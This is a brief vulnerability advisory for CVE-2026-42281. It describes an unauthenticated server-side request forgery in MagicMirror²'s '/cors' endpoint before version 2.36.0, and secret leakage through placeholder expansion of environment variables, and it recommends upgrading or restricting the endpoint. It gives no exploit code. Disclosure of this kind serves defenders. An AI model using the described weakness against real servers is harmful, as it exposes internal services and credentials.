CVE-2026-42281

Name of the Vulnerable Software and Affected Versions MagicMirror² versions prior to 2.36.0

Description An unauthenticated Server-Side Request Forgery (SSRF) exists in the '/cors' endpoint, which acts as an open HTTP proxy without authentication or URL validation. This allows remote attackers to force the server to perform arbitrary HTTP requests to localhost services, cloud metadata services, and internal networks. The issue is located in the cors() function within js/server functions.js. Additionally, the replaceSecretPlaceholder() function expands environment variable placeholders using the **VAR NAME** pattern, which enables the exfiltration of server-side secrets such as API keys, tokens, and database credentials from process.env.

Recommendations Update MagicMirror² to version 2.36.0. As a temporary workaround, restrict access to the '/cors' endpoint to minimize the risk of exploitation.